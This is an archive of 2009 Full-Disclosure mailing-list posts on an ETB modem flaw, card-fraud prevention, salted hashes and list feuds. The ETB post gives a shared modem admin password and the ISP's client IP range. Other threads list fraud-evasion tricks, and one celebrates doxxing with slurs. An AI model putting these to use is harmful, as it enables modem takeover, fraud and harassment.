 routers) used by a Colombian ISP - ETB.

 It so happens that all incoming connections to an IP address on said ISP on 
 port 23 or port 80 land on the modem instead of the computer(s) connected to 
 it. Even if one tries to redirect those ports to a local machine, the modem 
 still gets all the connections on those ports.
 Also, connections on ports 23 and 80, from any IP address, will access the 
 modem configuration options. Last year that could be done only from private 
 IP addresses (i.e. 192.168.0/24), but now it can be done, as I said, from 
 anywhere. I've been told that a few lucky users were able to forward port 80, 
 but in that case, it's port 8080 that is intercepted by the modem.
 The end result is that anyone, from anywhere, can access the modem of anyone 
 on ETB to mess up their configuration (e.g. obtaining and changing the 
 client's username and password, permanently disconnecting them from the 
 internet, and so on) - that is, if they have the administration password. 
 Unfortunately, ETB uses the same login/password on all of their modems since 
 2006, which are publicly available on the web.
 Login: Administrator
 Password: soporteETB2006

 The whole IP range 190.24/14 corresponds to ETB clients. Any IP on that range 
 where ports 80 and 23 are open is most likely a wide open ETB modem.

 Apparently, this issue has been repeatedly reported to ETB, but it always 
 falls on deaf ears. They seem to think this is no big deal since nobody knows 
 the username and password for the modems - which is not the case, and even if 
 it were, they would be easily crackable by brute force.

 Peace,

 -Cilia



      
 


Re: [Full-disclosure] security hole on local ISP

2009-12-29 Thread T Biehn
This is a Hiroshima versus 'harmless' mountain demonstration debate,
Lee. Because the post includes the raw data including ports, passwords
and ranges one must assume that Cilia Pretel Gallo was appealing to
the lowest common denominator, to a group of individuals where
checking NRO whois db for ETB's netblocks would not be an obvious
first step.

Ahem.

-Travis

On Tue, Dec 29, 2009 at 11:36 AM, Lee ler...@gmail.com wrote:
 On Tue, Dec 29, 2009 at 10:23 AM, T Biehn tbi...@gmail.com wrote:

 This is an orgiastic dump of information, you must really hate ETB; or
 you must be really excited for lulz.

 or you're hoping that full disclosure will get ETB to fix the problem.

 Regards,
 Lee


 -Travis

 On Tue, Dec 29, 2009 at 5:23 AM, Cilia Pretel Gallo
 cpretelga...@yahoo.com wrote:
  I've recently discovered a security hole on the modems (which double as
  routers) used by a Colombian ISP - ETB.
 
  It so happens that all incoming connections to an IP address on said ISP
  on port 23 or port 80 land on the modem instead of the computer(s) 
  connected
  to it. Even if one tries to redirect those ports to a local machine, the
  modem still gets all the connections on those ports.
  Also, connections on ports 23 and 80, from any IP address, will access
  the modem configuration options. Last year that could be done only from
  private IP addresses (i.e. 192.168.0/24), but now it can be done, as I 
  said,
  from anywhere. I've been told that a few lucky users were able to forward
  port 80, but in that case, it's port 8080 that is intercepted by the modem.
  The end result is that anyone, from anywhere, can access the modem of
  anyone on ETB to mess up their configuration (e.g. obtaining and changing
  the client's username and password, permanently disconnecting them from the
  internet, and so on) - that is, if they have the administration password.
  Unfortunately, ETB uses the same login/password on all of their modems 
  since
  2006, which are publicly available on the web.
  Login: Administrator
  Password: soporteETB2006
 
  The whole IP range 190.24/14 corresponds to ETB clients. Any IP on that
  range where ports 80 and 23 are open is most likely a wide open ETB modem.
 
  Apparently, this issue has been repeatedly reported to ETB, but it
  always falls on deaf ears. They seem to think this is no big deal since
  nobody knows the username and password for the modems - which is not the
  case, and even if it were, they would be easily crackable by brute force.
 
  Peace,
 
  -Cilia
 
 
 
 
   


Re: [Full-disclosure] Global warming - it's all about the money

2009-12-20 Thread T Biehn
There are no fundamental truths. That's the only axiom you can really
rely on. The acceptance of this fact is the first on the road to
enlightenment... or Schizophrenia.

That's all for now, the suited men from a 1950's spy flick are watching
me from a vintage crown vic. Joke's on them, I've dressed my hair in
petroleum jelly.

-Travis

On Sat, Dec 19, 2009 at 4:57 PM, Stephen Mullins
steve.mullins.w...@gmail.com wrote:
...it's hard to know what's true in the comings and goings of men throughout 
the world

 Follow the money.

 On Tue, Dec 15, 2009 at 11:09 AM, Jared DeMott jared.dem...@harris.com 
 wrote:
 Paul Schmehl wrote:
 http://www.wnd.com/index.php?fa=PAGE.view&pageId=118953

 Businesses hold world hostage over carbon credits
 Even U.N. climate chief tied to new, 'green' extortion scam

 It was never about the climate.


 Not sure about all that, but it is sad that it's hard to know what's
 true in the comings and goings of men throughout the world.  Fortunately
 there are fundamental Truths you can hang your hat on. ;)



Re: [Full-disclosure] Transmission #19-WT [re: Andrew Wallace / n3td3v]

2009-12-02 Thread T Biehn
Any hexadecimally represented 16 bytes is obviously an MD5.
For those interested in finding signal where there is none:
LM hashes are 16 bytes, but are actually two concatenated 8 byte DES hashes.

On Tue, Dec 1, 2009 at 2:52 PM, McGhee, Eddie eddie.mcg...@ncr.com wrote:
 N3td3v I am Scottish and coming for your boxes

 In yer area wee man. Fjeer.

 -Original Message-
 From: full-disclosure-boun...@lists.grok.org.uk 
 [mailto:full-disclosure-boun...@lists.grok.org.uk] On Behalf Of genesis 
 project
 Sent: 01 December 2009 19:47
 To: full-disclosure@lists.grok.org.uk
 Subject: [Full-disclosure] Transmission #19-WT [re: Andrew Wallace / n3td3v]

 BEGIN TRANSMISSION

 

Re: [Full-disclosure] when I grow up

2009-10-06 Thread T Biehn
Can't you make a good hunk of low-risk cash by 'pretending' to be a
money mule? (Profile: 20s, looking for 'easy' work.)

-Travis

On Tue, Oct 6, 2009 at 8:40 AM, RandallM randa...@fidmail.com wrote:
 ...when I grow up Daddy, I want to be a Money Mule!

 --
 been great, thanks
 a.k.a System



Re: [Full-disclosure] when I grow up

2009-10-06 Thread T Biehn
VK, obviously you don't own the account you have them send the money to.
You just happen to have an 'entangled' ATM card.

-Travis

On Tue, Oct 6, 2009 at 11:00 AM,  valdis.kletni...@vt.edu wrote:
 On Tue, 06 Oct 2009 10:46:19 EDT, T Biehn said:
 Can't you make a good hunk of low-risk cash by 'pretending' to be a
 money mule? (Profile: 20s, looking for 'easy' work.)

 Stealing from the old Mafia wasn't so bad.  If you got caught, it was
 usually just business and they dispatched you in the most economical
 way feasible.

 These days, the field is dominated by crazy and ruthless South American drug
 cartels, ruthless and crazy Asian Yakuza-like gangs, and *really* crazy,
 ruthless, psychopathic gangs from the Ukraine.

 Low risk? Hardly.







Re: [Full-disclosure] Chargebacks and credit card frauds

2009-09-23 Thread T Biehn
Prepaids can be had in the US and Canada sans ID. Fake IDs cheap, easy to get.

DIDs are cheap, usually free.

How many of those nett'd households have VoIP phone service? Hijack
inbounds for re-routing to your own (free) SIP server provider?

Implementing some sort of automated call verification service is expensive, CBA?

Credit cards are insecure, you're playing cat and mouse games until
your checks become too invasive for end consumers. Perhaps you insist
on a verifying payment gateway and flag all other transactions for
manual processing in addition to adding new lists for IP checks.

Glorious,

-Travis

On Wed, Sep 23, 2009 at 11:47 AM, Anıl Kurmuş akur...@gmail.com wrote:
 As others have mentioned, you have to assume the machines are
 compromised. This means you should use another channel for
 authorization of each transaction (depending on the use of your
 website,  only authenticating the user through this channel could be
 enough but this is more risky and vulnerable).

 I would say the most cost effective one is probably to use SMS/cell
 phones.  You would send an SMS with the transaction details and a
 verification code to be entered on the website for finalizing the
 transaction. If the state/country given by the phone number doesn't
 match the billing address, you throw a red flag as you did before.

 So if an adversary wanted to cheat, he would need to enter a cell
 phone from the same region/country. Assuming he can find infested
 machines in the same country, this is not really difficult, still it's
 new and makes it harder. Of course, the main advantage is that in many
 countries, it's not easy nowadays to get a prepaid cell phone without
 giving any IDs for instance, so this might act as a deterrent. A
 better (but more expensive and slower) solution though would be to
 authenticate the cell phone number through postal mail at setup
 time/when changing the cell number.


 Anıl Kurmuş
 ---
 GPG Key :
 http://perso.telecom-paristech.fr/~kurmus/key



 On Tue, Sep 22, 2009 at 06:26, Steven Anders anders...@gmail.com wrote:
 Hi everyone,

   I work as an engineer at an online company that sells an online subscription
 service for an online tool. We accept orders online using credit card numbers
 and we use Authorize.net to process credit card payments.

 Our standard operating procedure for online orders is: the normal checks are
 checks of the billing address and IP address - we make sure the billing
 address is a match and the IP address geo location is good (meaning, it is
 pretty close to the billing city or state). We use a service called MaxMind
 and we check to make sure that the IP address geo location is in proximity
 to the billing address. From our experience, another big red flag is if the
 IP is from a proxy server, or from web hosting company (could be SSH
 tunnelling), or outside USA ( Russia, Estonia, China, etc )

  If these checks throw a red flag, we will call the person to confirm the
 order. With this process, we pretty much have a very low fraud rate.

   Lately, in the past couple of months, we've been receiving a lot of orders that
 bypass all these checks without any glitch. The AVS (Address verification
 service pass) checks for the billing addresses and the IP addresses are good
 (in proximity to the billing address). The IP addresses are near the billing
 addresses (for example: billing address is Chicago, IL and the IP address is
 Evanston, IL - a couple miles from Chicago).

 Only a few weeks later, we have an influx of chargebacks and phone calls
 from the original owners of the credit cards, since these people never
 ordered it - and they are all fraudulent orders.  The only similar patterns
 in all these orders is that:
   1)  they use free email accounts (from Yahoo , Hotmail, etc) .
   2) All the IPs are from ISPs such as Sbcglobal, Comcast, Cox
 Communications, etc .

   My big question is: I know there are all kinds of ways people could obtain
 stolen credit card numbers, and their billing addresses, and so forth.

  But. I was wondering:

 1. how do they place the orders using all the legit IPs - since all the IPs
 are from Sbcglobal  , Cox communications,  and all the other major ISPs near
 the billing addresses.  Could it be that they actually took control of the
 PCs and then steal the credit card, and then place the order remotely from
 the controlled PC?

 2. Any insights on how these fraudsters obtain the stolen credit card
 numbers?

 I am now tasked with improving our backend checks to make sure we don't have
 any more fraudulent orders, and would appreciate any pointer or insights into
 this matter. Any theories, insights, or information would be very useful.

 Thank you all for your time in advance.
 steve





 

Re: [Full-disclosure] Chargebacks and credit card frauds

2009-09-22 Thread T Biehn
You could run IP against spam bl's, ISC lookup, dronebl, proxybl for flagging.

-Travis

On Tue, Sep 22, 2009 at 2:36 PM, Steven Anders anders...@gmail.com wrote:
 Thanks Andrew for the suggestion.
 Yes, it does make sense to do all the checks you described. These days, as
 manual process, we just make a phone call and do a follow-up email.
 We ask for a copy of the credit card to be faxed and a proof of ID. Many
 times the fraudsters do a reply with very bad English  - sometimes it is
 funny.
 And you're right - a lot of the orders are placed on non working hours.


 On Mon, Sep 21, 2009 at 10:29 PM, Andrew Haninger ahan...@mindspring.com
 wrote:

 On Tue, Sep 22, 2009 at 12:26 AM, Steven Anders anders...@gmail.com
 wrote:
  I am now tasked with improving our backend checks to make sure we don't
  have
  any more fraudulent order, and would appreciate any pointer or insights
  into
  this matter. Any theories, insights, or information would be very
  useful.
 I have three ideas. Two are quite complicated and the other a little
 simpler. None are fraud-proof. Some may be impractical if your work is
 being done after the fact.

 1) Have a robot call or text the customer a CAPTCHA-type string to
 enter into a website.

 Workaround: Register a cell phone or VoIP number in the victim's area
 code and take the call. You could possibly require a hard-wire
 landline, but those are becoming so uncommon that it would create
 trouble for many of your customers. And then there are those darned
 dialup users.

 Perhaps do this only after a first offense. Though, I'm guessing
 fraudsters only use the accounts once and then avoid them.

 2) Have a Flash or Java applet check for common remote desktop servers
 running on the ordering PC.

 Workaround: Disguise the server software as something harmless, if it
 isn't already.

 3) Check to see if the order was placed outside normal waking hours or
 during normal working hours.

 Workaround: Not hard to work around, but might hassle the criminals.

 Andy
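
Added example, not part of the thread: one way to implement the blocklist lookup suggested at the top of this message, flagging an order's source IP for manual review when a DNS blocklist lists it. The zone names, function names and sample answers are assumptions or constructed; the resolver is injected so the sketch runs offline.

```python
import ipaddress
import socket

# Assumed zone names for illustration; confirm each list's current zone and usage terms.
ZONES = ("dnsbl.dronebl.org", "zen.spamhaus.org")

LISTED_NET = ipaddress.ip_network("127.0.0.0/8")
# Some lists, Spamhaus among them, answer in 127.255.255.0/24 to signal a refused
# or malformed query. Treating that as a listing would flag every customer.
ERROR_NET = ipaddress.ip_network("127.255.255.0/24")


def dnsbl_name(ip: str, zone: str) -> str:
    """Build the query name: IPv4 octets reversed, then the blocklist zone."""
    addr = ipaddress.ip_address(ip)
    if addr.version != 4:
        raise ValueError("this sketch handles IPv4 only")
    return ".".join(reversed(str(addr).split("."))) + "." + zone


def system_resolver(name: str) -> list:
    """Resolve through the OS; a failed lookup (including NXDOMAIN) means no answer."""
    try:
        return socket.gethostbyname_ex(name)[2]
    except (socket.gaierror, socket.herror):
        return []


def check_ip(ip: str, zones=ZONES, resolve=system_resolver) -> dict:
    """Return which zones list the address, and which returned an error code."""
    listed, errors = [], []
    for zone in zones:
        for answer in resolve(dnsbl_name(ip, zone)):
            answer_addr = ipaddress.ip_address(answer)
            if answer_addr in ERROR_NET:
                errors.append((zone, answer))      # lookup problem, not a listing
            elif answer_addr in LISTED_NET:
                listed.append((zone, answer))
    # A listing is a reason for manual review, not an automatic decline.
    return {"ip": ip, "flag_for_review": bool(listed), "listed_in": listed, "errors": errors}


# Constructed answers for documentation-range addresses, standing in for real DNS.
CONSTRUCTED_ANSWERS = {
    "7.113.0.203.dnsbl.dronebl.org": ["127.0.0.9"],
    "9.100.51.198.zen.spamhaus.org": ["127.255.255.254"],
}


def fake_resolver(name: str) -> list:
    return CONSTRUCTED_ANSWERS.get(name, [])


if __name__ == "__main__":
    for order_ip in ("203.0.113.7", "198.51.100.9", "192.0.2.1"):
        print(check_ip(order_ip, resolve=fake_resolver))
```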




Re: [Full-disclosure] Andrew Aurenheimer aka weev gets tree'd

2009-09-17 Thread T Biehn
Mapping weev-IRL has no real impact, as he has either an entirely
different identity or a DBA, if this was a fictional account on weev's
part it would be certainly easy, effective, and feasible for him to
change a single letter in his name.

For the next part, you might want to grab some calming tea or something...

If you've achieved anything it's angering his online persona, these
typically only become a bit more malicious and difficult to catch.
You've succeeded only in creating an even larger 'weev.'
Try posting a home address next time.
For bonus points engineer some sort of scheme where the hive becomes
enraged and R4L's him.
It's been done before, and will be done again by those with real 'talent.'

Given that weev has demonstrated competency in all the above I think
it prudent that you not associate this disclosure to any of your
other online identities. (Brag on IRC already? Who did you work with?
You seem to be somewhat close to weev, enough to have a personal
vendetta against him, do you know that everyone you've talked with
actually hates the guy enough not to drop your pseudonym?)

-Travis

On Wed, Sep 16, 2009 at 8:52 PM, zewbiec...@gmail.com
zewbiec...@gmail.com wrote:
 what does google earth have to do with any of this?

 On 9/16/09, GOBBLES gobbles1...@safe-mail.net wrote:
 What do you mean Sherrod *was* a fed?

 Obviously the point wasn't to ruin. The point was to salt the earth by
 filling google with your real name.

 I can now officially say the (Google) Earth has been salted for you. You'll
 never be able to live a real life again. You'll always be hiding in the
 shadows for the rest of your life now.

 It may not hit you now, but eventually you'll feel suffering and despair.

 I'm the one who helped in the process of clipping your wings to keep your
 grounded. To leave you in the world where mediocrity will never come.

 You are a monster for what you did to Kathy... She's a great UX designer and
 a beautiful woman...

 Sincerely,

 Tim O'Reilly

 Btw all dogs go to heaven was awesome you fucking faggot

  Original Message 
 From: Andrew A glutt...@gmail.com
 To: GOBBLES gobbles1...@safe-mail.net
 Cc: full-disclosure@lists.grok.org.uk
 Subject: Re: [Full-disclosure] Andrew Aurenheimer aka weev gets tree'd
 Date: Tue, 15 Sep 2009 23:52:42 -0500

 Okay. You've been in contact with Hep? She's handed over her logs? Oh
 man, the FBI now has hundreds of megs of me scrolling ansi on IRC,
 telling her she's a sickly withered ghoul, calling her fat, and making
 fun of her Springeresque living situation of having 3 different kids
 by 3 different dads (seriously hep is basically the hip web2.0 version
 of used up trailer trash whore).

 Oclet's handed over his logs? Wow, the FBI now has records of all the
 times I've told him to stop doing cocaine and drinking and clean up
 his act.

 Sherrod DeGrippo was indeed a fed. If she's turned against me, the FBI
 now has all the records of me posting the information of people with
 autism to Encyclopedia Dramatica! I'm goin' down!

 Tehdely, the gay San Francisco Jew who works for blogging house Six
 Apart will be able to tell a jury that I, in the haze of a 5-balloon
 dose of nitrous oxide, did a sieg heil salute and shouted heil
 hitler while giggling hysterically. I, clearly, will be screwed by
 this revelation of SECRET KNOWLEDGE in the grand jury proceedings.

 And actually, you can make your living off of advertising and selling
 t-shirts. I made high sfigs off of direct marketing alone for several
 years.

 You antis are pathetic. You think you got one up on me by pasting some
 fuckin info I put in my fuckin LIVEJOURNAL? Is this what hackin is
 these days? Are you gonna start syndicating emo rants from 14 year old
 girls into f-d posts with ascii banners at the top, acting like you
 owned people?

 See, for a doxdrop to be proper, you have to do info that is not
 already public, and you have to tie it together in a way that reveals
 something about their lives that they did not want people to know.

 For example, when some clever soul revealed that Rob Levin of freenode
 didn't actually live in a trailer, had all sorts of welfare and was
 still using people's donations to supplement his income, that was a
 pretty sweet doxdrop:
 http://antisec.wordpress.com/2006/06/27/eyeballing-rob-levin/

 Or when somebody pieced together Kathy Sierra's sordid history of dick
 sucking, that was pretty fuckin' awesome:
 http://www.derkeiler.com/Mailing-Lists/Full-Disclosure/2007-03/msg00507.html

 You, sir, are a fucking amateur. You haven't uncovered anything new
 (the most well funded law enforcement organization in the world had to
 do that for you in their organized campaign, and you copied it from my
 livejournal), and it is certainly not anything I tried to hide, as I
 put it in my fucking blog. No secrets uncovered, no dark past
 revealed, just shit you copied from my livejournal to full-disclosure.
 Doxdrop is not copy and paste. You 

Re: [Full-disclosure] Time to stop this non-sense

2009-08-28 Thread T Biehn
That's cool, your mom still 

superfluous.

-Travis

On Fri, Aug 28, 2009 at 12:50 PM, Gavin netmatt...@gmail.com wrote:
 2009/8/28 T Biehn tbi...@gmail.com:
 Dear Gavin:

 My internet pseudonym is List.
 I suggest that you stop spreading libel about me on the internet or I
 will be forced to hire internet police and ruin your life.

 FOREVER.

 -Travis

 Not before I pwn your Grandma's PC and divert your weekly allowance. ;)






Re: [Full-disclosure] Sexless schadenfreude: the potential extremist Michael Crook.

2009-08-25 Thread T Biehn
I'm sure the man already has his big eye on Michael, especially since
his last name is Crook, these are facts they wouldn't miss.

On Tue, Aug 25, 2009 at 10:49 AM, valdis.kletni...@vt.edu wrote:
 On Tue, 25 Aug 2009 10:07:07 -, Michael Crook said:

 ~ John Doe / n3td3v (http://www.twitter.com/n3td3v)

 P.S. This is an anonymous,

 Hint: Look up big words like anonymous in the dictionary, make sure
 you're using them correctly. It adds that extra luster of competence to
 your postings.



Re: [Full-disclosure] Questions for the iProphet

2009-08-21 Thread T Biehn
Do what thou wilt shall be the whole of the law

On Fri, Aug 21, 2009 at 11:16 AM, Paul Schmehl pschmehl_li...@tx.rr.com wrote:

 --On Friday, August 21, 2009 04:03:40 -0500 netdev.doc...@hushmail.com wrote:

 
  Hey weev.
 
  Now that the FBI and everything are all out to get you, I was
  wondering what life on the lamb was like.

 Wouldn't life on the lamb be sheepophilia?  Wouldn't it be better to have life
 on the sheep, if you're so inclined?

 Or did you mean life on the lam?

 --
 Paul Schmehl, Senior Infosec Analyst
 As if it wasn't already obvious, my opinions
 are my own and not those of my employer.
 ***
 It is as useless to argue with those who have
 renounced the use of reason as to administer
 medication to the dead. Thomas Jefferson

 ___
 Full-Disclosure - We believe in it.
 Charter: http://lists.grok.org.uk/full-disclosure-charter.html
 Hosted and sponsored by Secunia - http://secunia.com/



--
FD1D E574 6CAB 2FAF 2921  F22E B8B7 9D0D 99FF A73C
http://pgp.mit.edu:11371/pks/lookup?search=tbiehnop=indexfingerprint=on
http://pastebin.com/f6fd606da



Re: [Full-disclosure] Slander of security researcher n3td3v

2009-08-11 Thread T Biehn
Very exclusive membership of notable fallators. Avoid option 5.

-Travis

On Tue, Aug 11, 2009 at 5:00 PM, anti...@hushmail.com wrote:
 Tell your faggot friend he can't be in our club.

 On Tue, 11 Aug 2009 16:24:09 -0400 someone lawyer
 some...@lawyer.com wrote:
List,

My client is genuine, he has never been part of anti-sec.

some...@lawyer.com





-- 
pgp http://pastebin.com/f6fd606da pgp



Re: [Full-disclosure] Salted passwords

2009-08-10 Thread T Biehn
Richard,
The approach I outline in my post is the correct one, that is, making
it computationally expensive to crack. I'm not trying to protect
passwords, think anonymizing account numbers and the like.. That is,
the possible combinations are a set that is unacceptably small.
Without an expensive compute step it's trivial to brute force given a
static salt location...

(excuse my use of shitty pseudocode, assume homogeneous length 10)

Typically the test is:

if storedHash = hashFcn(userPassword & storedSalt) //9,999,999,999 tests

if you randomly store the storedSalt ANYWHERE within userPassword, it becomes

for (int i=0; i<len(userPassword); i++) {
    String toTest = substring(userPassword,0,i) & storedSalt & substring(userPassword,i)
    if storedHash = hashFcn(toTest) {
        return true;
    }
}
return false; //99,999,999,990 tests

and like hashFcn could be

for (int i=0; i<expensive; i++) {
    x = pgp(x);
    x = md5(x);
}
return x;

It'd be heavy if pgp were using 4096 bitsize keys. Tweak 'expensive'
to match average acceptable test time. (5 seconds to run 10 tests.)

The set size increases, and brute force attempts become more difficult
(as for each brute force test in the set you must test 'strlength'
times). That is, in a set of homogeneous length strings the hash set
is set size times string length.

I believe this is a rather typical approach. I'm interested to see if
someone else has any other ideas/accepted methods for effectively
increasing the hash set size without increasing the value set size.

It's more so that I'm trawling the net for like minded individuals
rather than soliciting actual advice. Other methods are fairly
obvious.
Using two salts with random locations, etc.

I'm afraid it follows, though, that I reach a point where it's too
expensive, and thus login to a service will suffer an unacceptable
delay, this limitation precludes me from preventing against cracking
by the 10 million dollar computer and certainly such a scheme will
not be 'future proof.'

-Travis

On Sun, Aug 9, 2009 at 11:56 PM, Richard
Golodnerrgolod...@infratection.com wrote:
**REDACTED**
explain please
**REDACTED**



Re: [Full-disclosure] Hindustan Times epaper Server Hacked

2009-08-10 Thread T Biehn
While your publications are slightly pretentious (who am I to talk?) I
applaud your idealism in an age of rampant cynicism.

Don't log into any US Government systems looking to liberate secret
UFO docs tho, that gets you extradited.

A small suggestion, do not use a consistent pseudonym, post completely
anonymously. It's difficult to keep the ego from making mistakes.

-Travis

On Sun, Aug 9, 2009 at 1:56 AM, Skywhitemat...@gmail.com wrote:
 Hindustan Times epaper Server Hacked
 http://sky.net.in/hindustan-times-epaper-server-hacked/

 Hindustan Times (HT) is India’s leading newspaper, published since 1924 with
 roots in the independence movement. In 2008, the newspaper reported that
 with a (circulation of over 1.14 million) ranking them as the third largest
 circulatory daily English Newspaper in India. The Mumbai edition was
 launched on 14 July 2005. HT has a readership of (6.6 million) ranking them
 as the second most widely read English Newspaper after Times of India.
 (Source: Wikipedia article on Hindustan Times) -
 http://en.wikipedia.org/wiki/Hindustan_Times

 HindustanTimes + Hindustan epaper Server Hacked
 http://lh4.ggpht.com/_gbWPSul_tCM/Sn5UNhLLVYI/ASM/JY9bc67HV14/s800/hindustan_times_hacked.jpg

 Why was Hindustan Times (HT) epaper Server Hacked ?

 Many people think that Hindustan Times (HT) (English Edition) + Hindustan
 (Hindi Edition) is available on the internet free of cost, HT Media has made
 it compulsory to register on their website in order to read the daily online
 edition of their published newspapers, on completion of registration HT
 Media provides you instant access to read daily edition, the CATCH is – you
 can only read the daily edition + past seven days editions (from the current
 date) as a free user, whileas if you wanna read any edition beyond seven
 days, you will have to pay a huge (rip off) amount to HT Media (in the name
 of digital archive subscription)


 Registration Information Collected by HindustanTimes
 http://lh6.ggpht.com/_gbWPSul_tCM/Sn5WIrsZxcI/ASs/Lc6NaQzxEfk/s800/HT_registration.jpg

 Free HindustanTimes Editions
 http://lh6.ggpht.com/_gbWPSul_tCM/Sn5UN35Yx5I/ASU/6THfLaMu00M/s800/HT_free_editions.jpg

 Restricted Access to HindustanTimes epaper Archives
 http://lh4.ggpht.com/_gbWPSul_tCM/Sn5UN5umsJI/ASY/5_SfNzOEm7w/s800/HT_newspaper_subscribe.jpg

 Archive Subscription Charges for HindustanTimes is a total Rip Off
 http://lh4.ggpht.com/_gbWPSul_tCM/Sn5ViIwx2aI/ASo/6TMgKDuc6Vg/s800/HT_archive_charges.jpg


 As a hacker, i think its not fair (for anyone) to loot common people and
 sell (publicly gained) information in such a way, so i decided to peek
 inside the server and find some bugs / architectural flaws which would allow
 me to access past newspaper (Images / PDF) editions for free

 Within a couple of hours, i managed to find some bugs / architectural flaws
 ( vulnerabilities) which gave out free access to the past (Images / PDF)
 newspaper editions

 Calvin and Hobbes publishing error

 I used to search the newspaper (HT hard copy) every morning for technology
 related news (hoping any Indian journalist must have written some piece)
 that went on for like weeks and then i started reading Calvin and Hobbes
 (the comic strip) every day published in HT Cafe

 On 2nd / 4th / 9th June, Hindustan Times (HT) published the same Calvin and
 Hobbes strip, how should i react against this publishing error by Hindustan
 Times, as a fan of Calvin and Hobbes, i expect new comic strip every day

 Checkout the exact same Calvin and Hobbes strip published thrice on various
 days in the single month of June (2009)

     2nd June

 http://epaper.hindustantimes.com/Web/HTMumbai/Article/2009/06/02/538/02_06_2009_538_013.jpg

     9th June

 http://epaper.hindustantimes.com/Web/HTMumbai/Article/2009/06/09/538/09_06_2009_538_002.jpg

     4th June

 http://epaper.hindustantimes.com/Web/HTMumbai/Article/2009/06/04/538/04_06_2009_538_006.jpg

 Informing the privileged authorities

 On 10th July 2009, i informed the editor and other top most authorities @
 HindustanTimes via email regarding the serious bugs / flaws (
 vulnerabilities) on their ePaper Server which can be exploited to compromise
 data and cause financial losses for HT Media

 My email to HindustanTimes
 http://lh5.ggpht.com/_gbWPSul_tCM/Sn5WJt3UKGI/AS0/KOnhjTtBNnk/s800/my_email_hindustan_times.jpg

 Rashmi Chugh's reply to me
 http://lh4.ggpht.com/_gbWPSul_tCM/Sn5W9mSD0pI/ATI/O5hazb5IIY4/s800/rashmi_livemint_reply.jpg

 Although i received a reply from Rashmi Chugh (Business Head and Publisher,
 LIVEMINT) within 3 minutes, i waited for 24 hours to receive other
 recipients reply (as i wanted to know what they thought about the issue) but
 sadly no one replied back except Rashmi Chugh, so i sent her a reply the
 other day

 My reply to Rashmi Chugh, LIVEMINT
 

Re: [Full-disclosure] Ureleet is the Anti-Sec

2009-08-10 Thread T Biehn
n3td3v, ureleet, and anti-sec are actually all Hitler, posting after
being recently unfrozen from cryogenic sleep. He is using this as part
of his black magic scheme to bring back nazi occultism and rule the
world once again.

Careful review of all posts shows the superstructure of a subconscious
mind-virus, waiting for a trigger event deep in the recesses of our
collective minds.

When you want to go to it
Relax don't do it
When you want to come

-Travis

On Sun, Aug 9, 2009 at 12:20 AM, anti...@hushmail.com wrote:
 n3td3v is our exploit coder. pheer infidelz.

 On Sat, 08 Aug 2009 19:31:26 -0400 someone lawyer
 some...@lawyer.com wrote:
List,

Ureleet is the Anti-Sec he been trying to slander n3td3v
(legitimate
security researcher) the whole time.

some...@lawyer.com



Re: [Full-disclosure] Salted passwords

2009-08-10 Thread T Biehn
Valdis,
I don't have control over the set. Sorry I wasn't more explicit about
this. Although, it should have been obvious that the solution needed
to satisfy the conditions:
Data to one way hash.
The set has 9,999,999,999 members.

Thanks for your input sweetie!

-Travis

On Mon, Aug 10, 2009 at 4:26 PM, valdis.kletni...@vt.edu wrote:
 On Sun, 09 Aug 2009 20:14:57 EDT, T Biehn said:
 Soliciting random suggestions.
 Let's say I have data to one-way-hash.
 The set has 9,999,999,999 members.

 Actually, if you're using a 10-digit decimal field, you probably have 10**10
 possible members - all-zeros counts too (unless there's *other* reasons zero
 isn't a legal ID).  It's those little off-by-one errors that tend to get you.
 ;)

 It's relatively easy to brute force this, or create precomp tables.

 That's because you only have 10M billion members to brute force against.

 So you add a salt to each.

 A better idea cryptographically would be to fix the 10**10 member limit, so
 that the set *could* have a much higher possible number of members.  Even
 staying at 10 characters, but allowing [A-Za-z0-9] (62 possible chars) raises
 your space to 62**10 or about 8.3*10**17 (or almost 10M times the difficulty).
 That's why most symmetric crypto algorithms use at least 64-bit or even larger
 keys, and even larger for RSA and similar public-key systems.





-- 
pgp http://pastebin.com/f6fd606da pgp



Re: [Full-disclosure] Salted passwords

2009-08-10 Thread T Biehn
Thank you for the thoughtful analysis Raid. The hash and salt are both
known to the attacker :)
It looks like I'm going to have to settle with confounding efforts by
the man via increased hash computation cost.

-Travis

On Mon, Aug 10, 2009 at 6:53 PM, r...@hushmail.com wrote:

 Travis,

 On Mon, 10 Aug 2009 22:50:32 +0200 T Biehn tbi...@gmail.com wrote:
I don't have control over the set. Sorry I wasn't more explicit
about
this. Although, it should have been obvious that the solution
needed
to satisfy the conditions:
Data to one way hash.
The set has 9,999,999,999 members.

 if these are the only two conditions, I wonder why a static salt
 does not satisfy your requirements? If the salt is not publicly
 known, the procedure is secure in respect to the hash-function in
 use...

 So, suppose the third condition is the salt may be publicly known.

 Suppose, we have plaintext (alphabet E, length of alphabet s = |E|)
 with fixed length, say 'c' chars. So if you insert the salt at a
 random position, there are c+1 possibilities for the position of
 the salt. So the bruteforce attacker has to run c more tests than
 having the salt in a fixed position.

 Comparing the two procedures under a theoretical view, there isn't
 a significant difference in terms of runtime complexity:

 If the salt is not publicly known and at a fixed position,
 complexity (means: number of possible plaintexts) is at O(s**c).
 Your method only raises complexity by a constant factor: It's at O(
 (c+1) * s**c).

 Theoretically this is negligible: If it takes me 2 hours to
 bruteforce procedure 1 (fixed position), why bother about 20 hours
 computing for procedure 2?

 Practically it depends on your overall requirements.

 Besides, your procedure lowers the latch for DoS... at least
 slightly (same argument as above).

 So far, my two cents...

 raid




-- 
pgp http://pastebin.com/f6fd606da pgp



[Full-disclosure] Salted passwords

2009-08-09 Thread T Biehn
Soliciting random suggestions.
Let's say I have data to one-way-hash.
The set has 9,999,999,999 members.
It's relatively easy to brute force this, or create precomp tables.
So you add a salt to each.
Still easy to brute force.
If you were to create it in such a way that the hash could exist
anywhere in the set member, does this increase the cost of computation
enough?

That is, consider a member 'abcdefg' with salt 329938255.
When authenticating against the server, it must permute over all
possible combinations of the salt and the set member in order to
determine the validity of the password.

If anyone has a better approach, or would like to approach me off
list, or knows of a list more suited to these queries please feel free
to redirect me :)

-Travis

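The scheme asked about in this post, together with the pseudocode and raid's cost analysis from the replies above, as an added example that is not code from any poster. It is scaled down to a constructed 3-digit member so the brute force finishes instantly; iterated SHA-256 is an assumed stand-in for the "expensive" pgp/md5 loop, and all function names are hypothetical.

```python
import hashlib
import hmac
from itertools import product

SALT = "329938255"  # salt value quoted in the original post

def stretched_hash(data: str, rounds: int) -> bytes:
    """Iterated SHA-256: an assumed stand-in for the thread's 'expensive' loop."""
    x = data.encode()
    for _ in range(rounds):
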